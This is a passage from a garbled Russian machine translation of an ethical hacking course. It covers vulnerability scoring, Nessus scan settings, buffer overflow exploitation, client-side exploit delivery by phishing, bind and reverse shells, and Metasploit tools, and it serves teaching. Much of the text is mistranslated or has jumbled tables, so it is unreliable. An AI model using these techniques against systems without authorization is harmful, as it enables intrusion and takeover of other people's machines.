Каждая уязвимость оценивается на основе того, как ее можно использовать, т. Е.
Возможность использования - и вред, который возникает в результате эксплуатации, то есть Воздействие . В
метрики для определения балла выглядят следующим образом:
Возможность использования
Локальный доступ Соседний Сеть
Доступ
Сеть (Удаленный доступ)
Высокий Середина Низкий
Сложность
Одинокий Никто
Множественная аутентификация
https://translate.googleusercontent.com/translate_f 110/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Влияние
Никто Частичное Полный
Конфиденциальность
Никто Частичное Полный
Честность
Никто Частичное Полный
Доступность
Баллы от 1 до 10. Уязвимости с рейтингом 1-3 относятся к категории низкого риска , а уязвимости с рейтингом
от 4 до 7 относятся к категории среднего риска , а те, кто набрал больше 7 баллов, относятся к категории высоко
Риск .
Базы данных об уязвимостях в Интернете
Ручной способ поиска существующих уязвимостей - проверка онлайн.
Базы данных CVE. Вы можете искать уязвимости по производителям, продуктам,
Идентификаторы CVE, типы, даты и т. Д. Популярные базы данных уязвимостей в Интернете:
www.cvedetails.com
www.securityfocus.com/bid
Допустим, мы хотим найти уязвимости, связанные с программным обеспечением.
Apache httpd 2.2.8 , мы можем посетить веб-сайт cvedetails.com, щелкнув по
Ссылка «Поиск версии», а затем введите сведения о нашем программном обеспечении, как показано на
изображение ниже:
Будьте осторожны при вводе правильных названий Поставщика и Продукта, как они есть.
иногда сбивает с толку. Например, если ввести «httpd» в поле «Название продукта».
приводит к другим результатам, чем при вводе «http-сервер».
После того, как вы нажмете «Поиск», вы должны увидеть список связанных уязвимостей.
с этой конкретной версией. Как показано на изображении ниже, каждая строка (запись)
представляет собой единственную уязвимость. Обратите внимание на CVE ID (это
уникальный идентификатор уязвимости), Оценка (которая представляет серьезность
уровень), а также описание.
https://translate.googleusercontent.com/translate_f 111/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Tenable Nessus
OpenVAS
Бесплатный сканер уязвимостей с открытым исходным кодом.
Доступно в Kali Linux.
Домашняя страница: http://www.openvas.org
Core Impact
Самый мощный сканер уязвимостей.
Включает фреймворк для эксплуатации.
Очень дорого.
Домашняя страница: https://www.coresecurity.com/core-impact
https://translate.googleusercontent.com/translate_f 112/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
2016 год, это 6.
Nessus выполняет автоматическое удаленное сканирование уязвимостей. Он содержит
база данных практически всех существующих и общедоступных уязвимостей; и это
база данных обновляется ежедневно. Каждая уязвимость обнаруживается через
определенный плагин, который отвечает за выполнение необходимых действий для
обнаружить, сообщить об этом. Существует более 80000 плагинов, охватывающих удаленные и
локальные уязвимости.
Установка Nessus
Текущая версия Nessus - 8, и ее можно загрузить с
Веб-сайт:
Стр.150
https://www.tenable.com/products/nessus
Бесплатная версия называется «Nessus Essentials», а платная -
называется «Nessus Professional». Nessus Essentials может сканировать до 16 IP-адресов.
только адреса. Это хорошо для образовательных целей. Nessus поддерживает
Microsoft Windows, Linux (Redhat, Debian, Ubuntu и др.), А также Mac
OS X. Загрузите версию, подходящую для вашей операционной системы.
Дополнительно вам понадобится лицензионный ключ, который будет отправлен на вашу электронную почту.
адрес, как только вы зарегистрируетесь онлайн.
Когда вы впервые запустите программу установки, она установит Nessus без подключаемых модулей (которые
определить сигнатуры уязвимостей). Таким образом, чтобы завершить
После установки вы можете получить доступ к Nessus из браузера, введя URL-адрес:
https: // localhost: 8834
Вам будет предложено ввести лицензионный ключ, а затем он запустится.
скачивание плагинов. Это может занять некоторое время и требует непрерывного
Подключение к Интернету:
Вам также будет предложено ввести имя пользователя и пароль. Эти полномочия
будет использоваться для доступа к панели управления Nessus:
https://translate.googleusercontent.com/translate_f 113/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Шаблоны сканирования
Если вы хотите запустить новое сканирование, вам будет предложено выбрать шаблон.
А значит, стоит разобраться, что такое шаблон сканирования перед
приступаем к запуску нового сканирования.
Вместо того, чтобы включать все плагины и, следовательно, сканировать все уязвимости,
иногда администратор безопасности хочет просканировать свою сеть на предмет определенного
множество уязвимостей. Шаблон сканирования включает соответствующие плагины.
при отключении всех остальных.
Настраивается только шаблон «Расширенное сканирование». Вы можете включить все
плагины или любой набор плагинов по вашему желанию. Остальные шаблоны предопределены.
Таким образом, если вы хотите запустить наиболее полное сканирование, выберите Расширенный
Сканируйте и активируйте все плагины. Однако недостатком здесь является медлительность.
Если вы хотите выполнить сканирование с включенными наиболее распространенными плагинами, вы
https://translate.googleusercontent.com/translate_f 114/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
можно использовать «Базовое сетевое сканирование».
Настройка нового сканирования
Для демонстрации здесь мы выберем «Расширенное сканирование».
шаблон. На следующей странице вам необходимо настроить основные параметры
сканировать. Вы можете ввести имя, описание и цели. Целью может быть
одиночный IP-адрес или имя хоста, или список имен хостов / IP-адресов, разделенных запятыми.
Вкладка настроек
На вкладке «Настройки» слева вы увидите разные разделы.
панель:
https://translate.googleusercontent.com/translate_f 115/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Расписание :
Включено По умолчанию расписание
отключено, что означает сканирование
будет работать немедленно.
Кроме того, вы можете запланировать
запустить сканирование в указанное время.
Как только вы включите расписание,
ниже появляются параметры.
Частота Вы можете указать, хотите ли вы запустить
сканирование только один раз или на
на периодической основе (ежедневно, еженедельно,
Уведомления :
Получатели электронной почты
Если вы хотите получить
уведомление при сканировании
заканчивается, вы можете ввести один или
больше адресов электронной почты.
Фильтры результатов Вы можете определить, какой тип
информация для отправки по электронной почте
уведомление.
общие настройки
Протестируйте местный Nessus
Если запущенная система
хозяин Нессус попадает в цель
диапазон, Nessus будет сканировать свои собственные
система, если эта опция включена.
Используйте быструю сетьЕсли этот параметр включен, сканер Nessus будет рассматривать
https://translate.googleusercontent.com/translate_f 116/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.155
Хрупкие устройства
https://translate.googleusercontent.com/translate_f 117/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Netware.
Сканирование в рабочем состоянии
Если этот параметр включен, Nessus будет сканировать
Технологические устройства
устройства, идентифицированные как работающие
Технологии (ОТ). К ним относятся
ПЛК (программируемая логика
Контроллеры), SCADA
(Диспетчерский контроль и данные
Приобретение) и DCS
(Распределенная система управления) и др.
Wake On LAN
Список MAC-адресов Вы можете предоставить файл со списком
MAC-адресов устройств, которые
есть Wake-on-LAN (WOL)
включено. Затем Nessus отправит
WOL Magic Packets тем, кто
устройства для их загрузки, а затем
сканировать их.
Ожидание времени загрузки
Это(вопределяет период времени до
минут) ждать между отправкой WOL
пакет и сканирование.
Сканирование портов :
Порты
Считать непроверенными Если этот параметр включен, сканер Nessus будет рассматривать
Обнаружение услуг :
общие настройки
Проверьте все порты, чтобы
Если
найти
этот параметр включен, сканер Nessus попытается
Сервисы определить сервисную версию
каждый открытый порт.
Искать SSL / TLS Если включено, вы будете контролировать, как
Сервисы Nessus обнаруживает службы,
включить SSL / TLS.
Искать SSL / TLS Есть два варианта:
на
Известные порты SSL / TLS
Только те порты, которые известны
использовать SSL / TLS проверены.
https://translate.googleusercontent.com/translate_f 119/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Все порты
Каждый открытый порт проверяется, если он
работает SSL / TLS
Антивирус
Определение антивируса Nessus сканирует антивирус
льготный период (в днях) подписи и определяет,
актуальны или нет. Номер
дней здесь определяет сколько лет
подписи могут быть перед
поднята тревога. Например, если
срок 3 дня, то есть
не поднимается тревога, если подписи
не обновлялись за последние
3 дня; будет поднята тревога
SMTP
Сторонний домен Это часть оценки SMTP.
Каждый раз, когда Нессус обнаруживает
SMTP-сервер в качестве цели, он
пытается отправить спам по электронной почте
через него на сторонний домен.
Домен должен находиться за пределами
целевой домен.
С адреса Это определяет Из - адреса,
появляется в тестовом спаме.
Адресовать Это определяет К - адрес , что
появляется в тестовом спаме.
Грубая сила :
https://translate.googleusercontent.com/translate_f 121/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
общие настройки
Используйте только учетные
Если
данные
этот параметр включен, Nessus
предоставляется пользователем.
не будет пытаться проверить значение по умолчанию
имя пользователя и пароли. Этот
вариант хорош в том случае, если цель
учетная запись настроена с
политика блокировки после некоторого сбоя
испытания.
Гидра
Всегда включать Гидру Hydra - сетевой пароль
(медленный) инструмент для взлома. Если эта опция
включен, Nessus будет использовать Hydra для
брутфорс имена пользователей и
пароли на серверах, требующие
аутентификация.
Файл логинов Вы можете указать файл со списком
имен пользователей, которые будут использоваться Гидрой
Файл паролей Вы можете указать файл со списком
паролей, которые будет использовать Hydra.
Веб-приложения :
Настройки веб-приложения
Сканирование веб-приложений. Вы можете включить сканирование веб-приложений.
приложения, которые отключены
дефолт. Когда Нессус обнаруживает
веб-сервер (например, Apache на порту
80), по умолчанию он пытается только
обнаружить на уровне сервера
уязвимости. Это не будет оценивать
запущенное веб-приложение (например, PHP)
поверх веб-сервера. если ты
включите эту опцию, дополнительный
список параметров может потребоваться
настроен.
Windows :
общие настройки
Запросить информацию По умолчанию сканер Nessus пытается
о домене SMB перечислить локальных пользователей Windows.
Если вы включите эту опцию, Nessus
https://translate.googleusercontent.com/translate_f 122/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
попытается перечислить
Пользователи домена.
Вредоносное ПО :
Настройки вредоносного ПО
Сканирование на наличиеЭто
вредоносных
позволяет Nessus
программ
сканировать
вредоносное ПО. Как только вы включите это
вариант, вы увидите список
параметры для настройки. Некоторые из
эти параметры:
https://translate.googleusercontent.com/translate_f 123/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
ОТЧЕТ : этот раздел
Nessus генерирует предназначенотчет.
окончательный для конфигураций, связанных спод-
Он содержит следующие тем, как
разделы:
Обработка
Отменить нормальный У Nessus есть собственный способ отчетности
многословие активность плагина. Однако вы можете
контролировать этот уровень многословности - с помощью
включение этой опции - либо увеличить
или уменьшить сообщаемую информацию:
Выход
общие настройки
Включить безопасные проверки
По умолчанию это включено. Несс будет
не запускать плагины, которые считаются
серьезно нарушает работу сети
устройств.
Если этот параметр включен, сканер Nessus не будет продолжать работу.
Остановить сканирование хостов
что стало сканирование цели, если в какой-то момент она
не отвечает во время обнаруживает, что цель не отвечает.
сканировать Это экономит время и ресурсы.
Сканировать IP-адреса в Если вы предоставили список IP
случайный порядок адреса, Nessus просканирует их в
случайная мода. По умолчанию Nessus
сканировать цели в последовательном порядке.
Параметры производительности
Замедлить сканирование Если этот параметр включен, сканер Nessus может регулировать скорость
когда сеть сканирования для размещения
обнаружена перегрузка пропускная способность сети.
Тайм-аут сети (в Это определяет период в секундах для
секунд) который Nessus будет ждать ответа
от цели.
Это определяет максимальное количество
Максимальное количество одновременных
чеков на хост плагин проверяет одну цель на
в любой момент времени.
Максимальное количество одновременных
Это определяет максимальное
хостов количество
за сканирование хосты для одновременного сканирования в любом
данное время.
Максимальное количество Это определяет максимальное количество
параллельный TCP установлены TCP-соединения для любых
сеансов на хост заданная цель.
Максимальное количество Это определяет максимальное количество
параллельный TCP установлены TCP-соединения для
сеансов на сканирование полное сканирование независимо от того, сколько
цели сканируются.
Настройки отладки
SNMPv3 :
Имя пользователя Чтобы сканер Nessus отправлял SNMP
запросы к серверу SNMP, ему нужен
https://translate.googleusercontent.com/translate_f 126/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Имя пользователя требуется независимо от
Уровень безопасности (ниже).
Порт Номер порта сервера SNMP. К
по умолчанию это 161.
Уровень безопасности SNMPv3 поддерживает три уровня
безопасность:
Аутентификация и конфиденциальность
Только аутентифицированные клиенты могут запрашивать
Информация; кроме того, все сообщения
зашифрованы. Если вы выберете это
вариант, вам необходимо указать
Алгоритм аутентификации и пароль
а также алгоритм конфиденциальности и
пароль.
SSH :
Метод проверки подлинности
SSH поддерживает разные методы для
аутентификация:
Сертификат
У клиента должен быть действующий
сертификат, который нужно добавить в
https://translate.googleusercontent.com/translate_f 127/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
разрешенные сертификаты на сервере. Если
вы выберете этот вариант, вам нужно будет
настроить Nessus вместе с пользователем
Файлы сертификата и закрытого ключа. В
Метод проверки подлинности сертификата - это
перейти на метод открытого ключа
(ниже), и это лучший способ
управление открытыми ключами пользователей и доверие к ним.
Kerberos
Если SSH-сервер интегрирован с
Сервер Kerberos (например, Домен
Controller), вы можете настроить Nessus
с именем пользователя, паролем, Kerberos
сервер и домен.
Пароль
Это самая распространенная конфигурация
для SSH серверов. Вам нужно только
Открытый ключ
У клиента должна быть пара
закрытые и открытые ключи; открытый ключ
необходимо добавить в список разрешенных
ключи. Вам необходимо предоставить файл с
Закрытый ключ к Nessus.
Окна
Метод проверки подлинности
Существуют разные способы входа в систему
целевой хост Windows:
Kerberos
Вы можете пройти аутентификацию, используя
Протокол Kerberos. Сервер Kerberos
чаще всего является контроллером домена
(ОКРУГ КОЛУМБИЯ). Вам необходимо предоставить
имя пользователя, пароль, сервер
имя хоста / IP-адрес и домен.
KM Hash
Вы можете получить доступ к хосту Windows, используя
хеш LanManager (LM).
Аутентификация состоится
Протокол SMB. Это общеизвестно
как Pass-the-Hash.
NTLM-хэш
Вы можете получить доступ к хосту Windows, используя
новый NTLM Hash. Аутентификация
будет проходить по протоколу SMB. Этот
обычно известен как Pass-the-Hash.
Пароль
Вкладка "Плагины"
Каждая проверка уязвимости или уязвимости выполняется Nessus как
Плагин. Существует более 140 000 плагинов. Плагины сгруппированы в
семейства на основе поддерживаемых ими платформ, протоколов или функций. В качестве
как показано на изображении ниже, левая панель включает список плагинов
семейств, а правая панель включает список плагинов любых выбранных
семьи.
https://translate.googleusercontent.com/translate_f 130/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Вы также можете нажать на кнопки в правом верхнем углу, чтобы включить или отключить
все плагины.
https://translate.googleusercontent.com/translate_f 131/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.176
https://translate.googleusercontent.com/translate_f 132/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Когда вы видите запись с фиолетовым тегом с надписью «MIXED», это означает, что это
группа уязвимостей разного уровня опасности. Они сгруппированы
вместе, потому что они связаны либо с одной и той же службой или протоколом.
Если вы нажмете на какую-либо определенную уязвимость или заметку, вам будет показана страница
с полной информацией о нем. Например, на следующем изображении показано
информация, относящаяся к Критической уязвимости « UnrealIRCd Backdoor
Обнаружение ».
https://translate.googleusercontent.com/translate_f 133/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 134/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Модуль 07 Эксплуатация
Вступление
Эксплуатация - это этап, следующий за этапом анализа уязвимости. Когда
вы, тестировщик на проникновение, определили все существующие уязвимости
наряду с их рейтингами риска, вам следует продолжить использование этих
уязвимости методически и тактически. Вам следует начать с эксплуатации
критические уязвимости, которые вызывают наиболее серьезные воздействия, прежде чем перейти к
менее серьезные.
Эксплуатация уязвимости может вызвать широкий спектр воздействий, например, удаленное
выполнение кода, повышение привилегий, раскрытие информации, отказ в обслуживании
(DoS) и т. Д. Кроме того, эксплуатация обычно осуществляется с помощью «эксплойтов». эксплуатируют
это фрагмент кода, который выполняет единственную задачу, которая заключается в использовании преимуществ
уязвимостью и причинить преднамеренное воздействие.
Вы можете вручную собирать общедоступные эксплойты; отличный онлайн-ресурс
это база данных эксплойтов (www.exploit-db.com). Или вы можете использовать автоматизированный
платформа эксплуатации, имеющая обновленную базу данных эксплойтов. Один из лучших
фреймворки для эксплуатации в индустрии безопасности - это Metasploit , который будет
рассматривается позже в этом модуле.
Последствия эксплуатации
Эксплуатация - это действительно использование уязвимости. И по
Воспользовавшись этим, злоумышленник оказывает определенное воздействие. Иногда
воздействие настолько велико, что атакующий получает полный контроль над целью, и
иногда это столь же минимально, как вывести целевую систему из строя на
промежуток времени. Ниже приведены некоторые из наиболее распространенных воздействий на
их описания:
Удаленное выполнение кода (RCE)
Злоумышленник может выполнять произвольные команды в целевой системе. Он получает
доступ к системе на уровне оболочки в контексте эксплуатируемых
процесс / услуга. Иногда RCE может быть в контексте обычного пользователя и
иногда это в контексте администратора или root. Это самый
серьезное воздействие, потому что злоумышленник имеет доступ для чтения, записи и выполнения.
Повышение привилегий
После эксплуатации злоумышленник получает дополнительные привилегии. Это могло произойти, если
https://translate.googleusercontent.com/translate_f 137/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Чтобы получить удаленную оболочку, хакеру необходимо создать специальный ввод. Этот
специально созданный ввод будет перезаписывать соседние ячейки памяти данными, которые
будет отлично выполняться позже ЦП, обманывая его для выполнения команд
вставлен вредоносным хакером.
Указатель инструкции
Указатель инструкции (IP) - это регистр ЦП в архитектуре Intel (IA),
и его основная роль состоит в том, чтобы указать на следующую инструкцию в памяти, которая должна быть
выполнен. Он был введен в серию 16-битных ЦП, где каждый регистр был
Длина 16 бит. Когда была изобретена 32-битная архитектура, IP стал
Длиной 32 бита и был переименован в Extended Instruction Pointer (EIP); потом
когда была представлена 64-битная архитектура, она стала 64-битной по длине
и был переименован в RIP.
Независимо от того, называется ли он, EIP, RIP или просто IP, роль этого регистра -
тем же; и то есть он содержит адрес памяти следующей инструкции, которая будет
выполнен. Таким образом, когда текущая инструкция завершает выполнение, CPU
проверяет регистр IP, переходит к адресу памяти, указанному в этом
регистр, получает инструкцию туда, увеличивает IP на одну единицу - 32 бита,
64bit и т. Д. - чтобы он указывал на следующий и выполнял недавно
получил инструкцию. И процесс повторяется.
https://translate.googleusercontent.com/translate_f 138/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
1 ➔ 2 ➔ 3 ➔ 11 ➔ 12 ➔ 13 ➔ 4 ➔ 5
https://translate.googleusercontent.com/translate_f 139/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Часть раздела данных - это стек, который представляет собой LIFO ( Last-In-First-Out ).
контейнер. В частности, стек содержит адрес возврата , который является
инструкция, которая должна выполняться сразу после завершения текущей функции или процесса.
Это адрес сразу после инструкции, которая выполнила переход или вызов
наша текущая функция. Помимо адреса возврата, стек содержит
переменные фиксированного размера, т. е. статически размещенные переменные.
...
char имя пользователя [50];
получает (имя пользователя);
...
Этот код C считывает [получает ()] введенные пользователем данные и помещает их в имя пользователя.
буфер. Код не проверяет размер ввода. Он помещает его прямо в
буфер как есть. Отсутствие проверки ввода является основным фактором, позволяющим
злонамеренный хакер для использования кода. Чтобы понять это, давайте посмотрим на
Возможны различные сценарии:
...
int MAXLEN = 50;
char имя пользователя [MAXLEN];
fgets (имя пользователя, MAXLEN, stdin);
...
В приведенном выше примере используется функция fgets (), которая безопасна по сравнению с
функция gets (). Последний не ограничивает количество символов для чтения.
от пользователя, а первый указывает максимальное количество символов для
читать. Используя fgets (), если пользователь вводит более 50 символов, только первый
50 читаются. В C есть некоторые функции, которые считаются небезопасными в смысле
https://translate.googleusercontent.com/translate_f 141/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
что они по своей сути не обеспечивают проверку ввода; таким образом, если разработчик
не проверяет ввод явно, программа становится уязвимой. это
всегда рекомендуется заменять эти небезопасные функции альтернативными
безопасные - те, которые имеют встроенную проверку размера ввода. Следующий
в таблицах показаны некоторые небезопасные функции и их альтернативные безопасные
версии:
Эксплуатация
До сих пор мы видели, что отправка достаточно большого ввода может вызвать отказ
услуга. Но как получить удаленную оболочку - выполнение команд - на
целевая система? Мы получаем это, создавая специальный ввод, который дает определенный
цель; то есть нам нужно обманом заставить ЦП выполнить часть нашего ввода.
Переменная, содержащая наш ввод, - это единственное, что мы можем контролировать. Мы
не может управлять какой-либо частью или разделом памяти, кроме ячеек, выделенных для
эта переменная; и поскольку нет проверки границ, наш ввод может расширять
за пределы выделенных ячеек в соседние ячейки памяти.
адрес 0x11223344:
https://translate.googleusercontent.com/translate_f 142/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Итак, обработанный ввод будет выглядеть - с более высокой точки зрения - следующим образом:
exec («/ bin / bash»): случайные символы (NOP): адрес буфера.
https://translate.googleusercontent.com/translate_f 143/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
1. Предотвращение выполнения данных (DEP)
Этот метод включает в себя пометку сегмента данных памяти как Non-
Исполняемый файл (NX). Таким образом, теперь в стеке могут храниться только данные. Любая попытка
выполнить код, находящийся в стеке, не удастся. И учитывая, что наш созданный ввод
- который включает инструкции - в конечном итоге будет находиться в стеке, наш
инструкции не будут выполняться. Когда функция вернется и наш вставленный
Обратный адрес вставлен в регистр EIP, ЦП должен получить
и выполнить инструкцию, на которую указывает этот EIP (наше значение); однако, поскольку
теперь EIP указывает на неисполняемый стек, произойдет исключение.
Типы эксплуатации
Систему можно использовать удаленно - по сети или через Интернет -
или локально. Это две широкие категории эксплуатации. С удаленным
эксплуатации, злоумышленник может либо использовать уязвимый сервер на определенном
Номер порта TCP или UDP или использовать клиентское приложение, которое затем инициирует
удаленное подключение к злоумышленнику. Таким образом, удаленная эксплуатация - это еще больше
разделены на эксплуатацию на стороне сервера и эксплуатацию на стороне клиента. С другой
стороны, локальная эксплуатация имеет место, пока злоумышленник уже имеет некоторую форму
доступа к системе; и такая эксплуатация приносит пользу злоумышленнику за счет
повышение привилегий этого доступа. То есть местная эксплуатация также
называется локальным повышением привилегий .
Удаленная эксплуатация
Любая эксплуатация, которая предоставляет злоумышленнику удаленный доступ к системе.
это удаленная эксплуатация. Чаще всего удаленная эксплуатация не требует
https://translate.googleusercontent.com/translate_f 144/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Уязвимые приложения, которые могут быть использованы, могут быть представлены как
сетевой сервер или его можно запустить как клиентское приложение в целевой системе. В
в случае его обнаружения эксплуатация здесь называется серверной; и это
самый простой вид эксплуатации. С другой стороны, если это клиентское приложение (т. Е.
на стороне клиента), для эксплуатации требуется дополнительный шаг; и то есть социальные
инженерное дело. Другими словами, злоумышленнику необходимо обманом заставить целевого пользователя
выполнение эксплойта .
Серверная эксплуатация
Сервер - это программная служба, предоставляемая по сети; то есть может
доступ через определенный номер порта по протоколу TCP или UDP. А
сетевая служба должна прослушивать определенный номер порта TCP или UDP.
Примеры серверов:
Система (CIFS)
Linux Файл Сетевая файловая система 2049 г.
(NFS)
Совместное использование
Серверы баз данных MySQL 3306
MSSQL 1433
https://translate.googleusercontent.com/translate_f 145/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Postgres 5432
Если злоумышленник знает, что целевой пользователь использует уязвимое приложение, например,
RealPlayer, он может приступить к разработке эксплойта для него. Эксплойт будет
обычно выглядит как файл MP3; однако он содержит вредоносную полезную нагрузку.
После этого злоумышленнику необходимо доставить этот файл эксплойта пользователю. В
способ доставки может отличаться в зависимости от ситуации. Общие способы
доставка включает отправку фишингового письма со ссылкой или вложением в
загрузить эксплойт, предоставив пользователю USB-накопитель, содержащий эксплойт,
и многие другие.
Когда пользователь открывает или запускает файл, вызывается уязвимое приложение.
( выполняется как процесс ), и теперь полезная нагрузка вводится в этот процесс. В
полезная нагрузка запускается и инициирует соединение с злоумышленником
система. У злоумышленника теперь есть сеанс оболочки для машины жертвы.
Ниже приведены примеры уязвимостей на стороне клиента и их публично
доступные эксплойты:
Клиентское приложениеID
и уязвимости и Публичный эксплойт
Версия Описание
RealNetworks Идентификатор Bugtraq: 47039 RealPlayer 11 - '.rmp'
RealPlayer 11 « RealPlayer склонен к Удаленный буфер
https://translate.googleusercontent.com/translate_f 147/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
удаленное переполнение буфера Переполнение
уязвимость, потому что
приложение не выполняет
адекватные пограничные проверки
на вводе, вводимом пользователем. ”
Гугл Хром CVE-2019-5786 Гугл Хром
до «Проблема времени жизни объекта72.0.3626.119
в -
72.0.3626.121 Моргание в Google Chrome Использование FileReader
до 72.0.3626.121 После освобождения
позволил удаленному злоумышленнику
(Метасплоит)
потенциально выполнять из
ограничивает доступ к памяти через
созданная HTML-страница ».
WinRAR 3.00 CVE-2006-3845 RARLAB WinRAR
через 3.60 beta « Переполнение буфера на основе3.x
стека.
- Имя файла LHA
6 в lzh.fmt в WinRAR 3.00 Обработка буфера
через 3.60 beta 6 позволяет Переполнение
удаленных злоумышленников для выполнения
произвольный код через длинный
имя файла в архиве LHA ».
https://translate.googleusercontent.com/translate_f 149/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Windows RT
8.1, Windows
10 золота,
1511, 1607, г.
и 1703 г.,
и Windows
Сервер 2016
позволяет
высота
привилегия
уязвимость
когда
злоумышленник бежит
специально
обработанный
заявление,
он же
'Окна
COM
Высота
Привилегия
Уязвимость ». ”
и изменить атрибуты
произвольные файлы наложения через
созданное приложение. ”
Чтобы узнать о других эксплойтах повышения привилегий в Linux, перейдите по следующей ссылке:
https://github.com/SecWiki/linux-kernel-exploits
Типы оболочки
Удаленная оболочка, которую пытаются получить хакеры при эксплуатации уязвимости, может
можно разделить на три различных типа: прямая оболочка, связанная оболочка и обратная
оболочка.
Прямая оболочка
Прямая оболочка - это оболочка, созданная в одном и том же TCP / UDP-соединении.
через который была отправлена полезная нагрузка. Давайте посмотрим на следующий сценарий:
При использовании оболочки bind полезная нагрузка инструктирует операционную систему открыть определенны
TCP-порт, например 4444, и свяжите этот порт с программой оболочки, такой как
https://translate.googleusercontent.com/translate_f 151/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
/следующий
etc / sh или% SYSTEMROOT% \ System32 \ cmd.exe. Рассмотрим
сценарий:
https://translate.googleusercontent.com/translate_f 152/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
1. Прежде чем хакер отправит полезную нагрузку для использования удаленной системы,
сначала он устанавливает сетевой слушатель на определенный порт, например, 4444.
2. Затем хакер отправляет полезную нагрузку, которая имеет следующие
инструкции: инициировать TCP-соединение от жертвы к
хакерской машине на порт 4444 и свяжите это соединение с
программа-оболочка.
3. Машина хакера получает и подтверждает
установление TCP-соединения.
4. Затем хакер может отправить жертве команды оболочки. В
команды выполняются, а ответы отправляются обратно
машина хакера.
Ценность Reverse Shell в том, что она может работать даже при наличии межсетевого экрана.
блокировка входящего трафика. Обратная оболочка будет работать до тех пор, пока брандмауэр
разрешает исходящий трафик на определенные порты.
В корпоративной среде исходящий трафик http / https всегда открыт, поэтому
сотрудники могли просматривать веб-страницы. Таким образом, обратная оболочка через порт 80 или 443 являетс
чаще всего собираюсь на работу. Мало того, даже если есть прокси-сервер, который
весь веб-трафик проходит, обратная оболочка может быть туннелирована через этот прокси
сервер. И в этом случае оболочка называется « Reverse HTTP Shell », которая является
конкретная версия обратной оболочки.
Фреймворк Metasploit
Фон
Проект Metasploit стартовал в 2003 году HD Moore. Идея заключалась в том, чтобы построить
платформа, которая делает процесс эксплуатации простым и автоматическим. До
Metasploit, эксплуатация была непростой задачей; эксплойты должны быть
модифицировано - вручную - для работы в различных ситуациях. Например, если публичный
эксплойт был написан с помощью оболочки привязки на порту 1234, и тестер хотел
обратная оболочка на порт 4321, ему нужно будет отредактировать код и протестировать его
полностью на системе, похожей на цель. Точно так же, если другой тестер
хотел полезную нагрузку, которая будет загружать и запускать бэкдор, он пойдет
через беду при интенсивном редактировании и тестировании. Дополнительно публично
доступные эксплойты были написаны на разных языках. Они могут быть в C,
Perl, Python или любой другой язык. Таким образом, если тестер использовал
разные уязвимости с использованием разных эксплойтов, написанных на разных
языков, ему потребуется использовать разные компиляторы или скриптовые движки. HD
Мур хотел решить эти проблемы раз и навсегда.
Metasploit изначально был написан на Perl. В 2007 году он был полностью переписан на
Рубин. Metasploit стал «де-факто» фреймворком для разработки эксплойтов.
Позже проект был приобретен Rapid7. Metasploit предустановлен в Kali
Linux. А его домашняя страница:
www.metasploit.com
Metasploit Framework предоставляет следующие преимущества:
Изучение Metasploit
Перед запуском Metasploit давайте исследуем его установочный каталог и получим
понимание его модульной структуры. Каталог установки по умолчанию:
/ usr / share / metasploit-framework /
В этом каталоге находятся следующие наиболее важные файлы и подпрограммы.
каталоги:
https://translate.googleusercontent.com/translate_f 154/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Nessus, установив подключаемый модуль Nessus.
Двоичные файлы
Бинарные файлы Metasploit начинаются с msf и представляют собой исполняемые файлы, выполняющие
некоторые основные операции. В следующей таблице перечислены описания наиболее
общие двоичные файлы:
Двоичный Описание
msfconsole Это позволяет вам запускать Metasploit в интерактивном режиме.
Когда вы запустите Metasploit Console, вы сможете
для выполнения внутренних команд. Это самый распространенный способ
работы с Metasploit.
msfvenom Это позволяет вам создавать полезные данные, упакованные в разные
форматы файлов ( например, exe, elf, php, war и т . д.). Это делает
полезная нагрузка ведет себя как троян или бэкдор. Полезная нагрузка
просто набор машинных инструкций, и он должен быть
вставлен в память как код для запуска. Это может
можно сделать либо с помощью эксплойта, либо с помощью оболочки. Мсфвеном
создает такую обертку.
msfupdate Вы можете запустить этот двоичный файл, чтобы обновить Metasploit.
Фреймворк. Обновления могут быть новыми эксплойтами, полезными нагрузками, ошибкам
исправления или дополнительные функции.
MSFD Это демон Metasploit. Это позволяет вам запускать
Metasploit как сетевая услуга. Затем вы можете использовать Telnet для
и работайте на нем как на консоли. Хост и порт по умолчанию
являются localhost (127.0.0.1) на порту 55554.
msfrpcd Запустите демон Metasploit RPC ( удаленный вызов процедур ).
Это предоставляет список API-интерфейсов ( прикладное программирование
Интерфейсы ), которые могут быть вызваны программно
удаленные клиенты. С MSFRPCD вы можете взаимодействовать с
Каталог модулей
Строительным блоком Metasploit является « модуль ». И все модули находятся под
